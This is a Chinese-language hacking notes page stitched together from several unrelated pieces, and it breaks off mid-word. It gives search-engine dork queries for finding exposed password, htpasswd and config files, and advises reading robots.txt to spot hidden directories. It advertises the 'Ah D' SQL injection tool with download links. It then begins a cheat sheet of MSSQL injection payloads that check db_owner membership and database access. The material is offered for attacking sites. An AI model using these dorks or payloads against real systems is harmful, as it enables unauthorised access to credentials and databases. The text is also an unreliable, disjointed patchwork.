allintilte:foo.com     我们可以辅助"-" "+"来调整搜索的精确程度    直接搜索密码：(引号表示为精确搜索) 当然我们可以再延伸到上面的结果里进行二次搜索 "index of" htpasswd / passwd filetype:xls username password email "ws_ftp.log" "config.php" allinurl:admin mdb service filetype:pwd ....或者某个比如pcanywhere的密码后缀cif等    越来越有意思了，再来点更敏感信息 "robots.txt" "Disallow:" file

网站搜索引擎所屏蔽的目录

“/robots.txt

在网址后加上“/robots.txt

可以看到所隐藏的目录

啊D注入工具 V2.32+网络工具包 V2.02 修正版

新版有什么修改：
1.数据保存保存加强了！
2.注入引优了一下！
3.CMD执行能力加强了！
4.修正了不少小BUG (太久了，我都忘了修改过什么了)!

啊D注入工具 V2.32 版 下载
http://www.d99net.net/down/DSQLTools%20%20v2.32.rar
如果你显示没有数据库文件，请下载数据库文件，不加入，是因为怕把你以前的

百度空间CSS
http://www.hack58.net/Soft/html/13/25/2007/2007080911134.htm
http://ww.hack58.net/Soft/html/13/25/2007/2007080911134.htm


SQL教程

转自 http://malbi.com.cn/article/186.htm

我记性不好，所以把常用的注入代码记录下来，有点乱，但对我来说，还算很有用，希望大家也会喜欢！

//看看是什么权限的
and 1=(Select IS_MEMBER(’db_owner’))
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(’master’))
An